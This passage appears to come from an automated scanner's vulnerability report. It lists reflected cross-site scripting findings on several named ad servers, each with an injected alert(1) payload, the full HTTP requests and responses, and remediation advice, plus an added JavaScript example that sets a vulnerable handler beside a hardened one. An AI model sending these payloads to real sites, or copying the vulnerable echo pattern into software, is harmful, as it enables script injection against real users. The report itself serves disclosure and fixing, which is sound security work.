_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#
=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0341.rm.sp2
Set-Cookie: ih="b!!!!#!3e$^!!!!C=57qT"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: vuday1=8ac=%N5HGH?9-O6; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$7w.!!%f!!%d(@!3e$^!'/%f!!mT+~)I#RI!ZmB)!(XE3!(Gex~~~~~~=57qT=9K[_!!.vL"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: liday1=x6!2#N5HGH:SAxO; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:43 GMT
Pragma: no-cache
Content-Length: 2619
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<span id="10288627">'); //raw JavaScript document.write('<scr'+'ipt language=\'javascr'+'ipt\' type=\'text/javascr'+'ipt\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?tid=6832 ...[SNIP]... d = '261950'; var asci_publiid = '3449146'; var asci_sectid = '2298003'; var asci_advliid = '3329023'; var asci_cid = '10288627'; var asci_p = '99'; var asci_refurl = escape('http://www.tmz.com/72a06';alert(1)//5908bbe03b7'); if ( asci_refurl.length > ...[SNIP]...
4.41. http://adnxs.revsci.net/imp [Z parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adnxs.revsci.net
Path: /imp
Issue detail
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250906f3'-alert(1)-'8a5c815ddd2&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 454

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250906f3'-alert(1)-'8a5c815ddd2&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250906f3%27-alert%281%29-%278a5c815ddd2%26s%3D229800 ...[SNIP]...
4.42. http://adnxs.revsci.net/imp [s parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adnxs.revsci.net
Path: /imp
Issue detail
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=2298003f3e33'-alert(1)-'9eac11f134b&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:53:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:53:10 GMT
Content-Length: 454

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003f3e33'-alert(1)-'9eac11f134b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003f3e33%27-alert%281%29-%279eac11f134b%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A ...[SNIP]...
4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection point is the message of a java.lang.NumberFormatException, written into the document head after a closing </script> tag: pid is parsed as an integer, and the failed parse's message, raw input included, is rendered into the page. Validating the parameter as an integer before use and returning an error that does not repeat the rejected value removes this sink; the placementId and ps findings on this host share the same root cause.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495&pid=2083767379d8<script>alert(1)</script>9352c1ee60b&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:04 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script> java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"
</head> ...[SNIP]...
4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two caveats a tester should record with this finding: the reflected text is again a java.lang.NumberFormatException message carrying the raw input, so integer validation before use is the fix; and the response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type shows it as text, and the script runs only in a client that sniffs the body as HTML.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495cb6e8--><script>alert(1)</script>c9166046b4e&pid=2083767&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3356
Content-Type: text/plain

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" --> ...[SNIP]...
4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-192fce--><script>alert(1)</script>3d86a354bdc&zw=250&zh=325&url=http%3A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/&v=5&dct=Nancy%20Grace%20--%20RUMPSHAKIN'%20in%20the%20TMZ%20Ballroom!!%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3870
Content-Type: text/plain

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" --> ...[SNIP]...
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4712
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent"> ...[SNIP]...
4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.tw.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=10397677b4c8<script>alert(1)</script>7900287ce39&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:49:31 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script> java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"
</head> ...[SNIP]...
4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.tw.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with the same finding on ads.adsonar.com, the reflected text is a java.lang.NumberFormatException message carrying the raw input (integer validation before use is the fix), and the response is served as text/plain without X-Content-Type-Options, so execution depends on the client sniffing the body as HTML.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=14593081c8c0--><script>alert(1)</script>d8f33500b41&pid=1039767&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:58 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3321
Content-Type: text/plain

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" --> ...[SNIP]...
4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.tw.adsonar.com
Path: /adserving/getAds.jsp
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
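The six getAds.jsp findings (4.43 to 4.45 on ads.adsonar.com and 4.48 to 4.50 on this host) have one root cause: placementId, pid and ps are integer identifiers, they are parsed as numbers, and the failed parse's exception text, raw input included, is written into the response, in four of the six cases inside an HTML comment. The following is an added example, not adsonar code (which is not public), that models that handler beside a hardened one which validates the type first and never echoes a rejected value. The handler shape, the optional-field handling and the constructed query strings are assumptions for the illustration; the probe values are the report's own.

```javascript
// Added example; models the getAds.jsp pattern, it is not adsonar's code.
// Field names come from the report, everything else is an assumption.

const INTEGER_ID = /^-?\d{1,18}$/;          // what a numeric id may look like
const ID_PARAMS = ['placementId', 'pid', 'ps'];

// Validate before anything is rendered; a rejected value is never echoed.
function parseAdRequest(query) {
  const params = {};
  const invalid = [];
  for (const name of ID_PARAMS) {
    const raw = query.get(name);
    if (raw === null) { params[name] = null; continue; }   // absent is allowed
    if (!INTEGER_ID.test(raw)) { invalid.push(name); continue; }
    params[name] = Number(raw);
  }
  return { ok: invalid.length === 0, params, invalid };
}

// Vulnerable rendering, shaped like the observed text/plain response: the
// exception message is dropped into an HTML comment with the raw input.
function renderVulnerable(query) {
  const raw = query.get('placementId') || '';
  if (!/^-?\d+$/.test(raw)) {
    return '<html> <body> <!-- java.lang.NumberFormatException: For input string: "' +
      raw + '" --> </body> </html>';
  }
  return '<html> <body> <!-- placement ' + raw + ' --> </body> </html>';
}

// If a value must ever appear inside a comment, make it unable to close the
// comment: escape the markup characters and neutralise every hyphen so "-->"
// cannot be formed. Entities are not decoded inside a comment, so this only
// serves a human reading the source, which is all a comment is for.
function commentSafe(value) {
  return String(value)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/-/g, '&#45;');
}

// Hardened handler: type-check first, reply 400 naming only the parameter.
function renderSafe(query) {
  const v = parseAdRequest(query);
  if (!v.ok) {
    return { status: 400, body: 'invalid parameter: ' + v.invalid.join(', ') };
  }
  return {
    status: 200,
    body: '<html> <body> <!-- placement ' + commentSafe(v.params.placementId) +
      ' --> </body> </html>',
  };
}

// Constructed inputs: one legitimate request and the report's probes for
// placementId (4.44 / 4.49) and ps (4.45 / 4.50).
const LEGIT = new URLSearchParams('placementId=1512388&pid=1098767&ps=-1');
const PROBE_PLACEMENT = new URLSearchParams(
  'placementId=1500495cb6e8--><script>alert(1)</script>c9166046b4e&pid=2083767');
const PROBE_PS = new URLSearchParams(
  'placementId=1459308&pid=1039767&ps=-14ea7c--><script>alert(1)</script>2eed884a416');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderVulnerable(PROBE_PLACEMENT));   // comment closed, script lands in body
  console.log(renderSafe(PROBE_PLACEMENT));         // 400, parameter name only
  console.log(renderSafe(PROBE_PS));                // 400, parameter name only
}
```

The point of parseAdRequest running before any output is that the error path has nothing attacker-controlled left to print; commentSafe is there only for the case where a validated value still ends up in a comment and the allowlist is later loosened.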
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=1039767&ps=-14ea7c--><script>alert(1)</script>2eed884a416&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3760
Content-Type: text/plain

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" --> ...[SNIP]...
4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://alerts.4info.com
Path: /alert/ads/dispatcher.jsp
Issue detail
The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response: the server URL-decodes %3b to a semicolon before concatenating, so the quote ends the string literal, the semicolon ends the assignment statement, and the // comments out the remainder of that source line, including the closing quote and the concatenation that follow.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522ba94d'%3balert(1)//bdd52ed5568&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
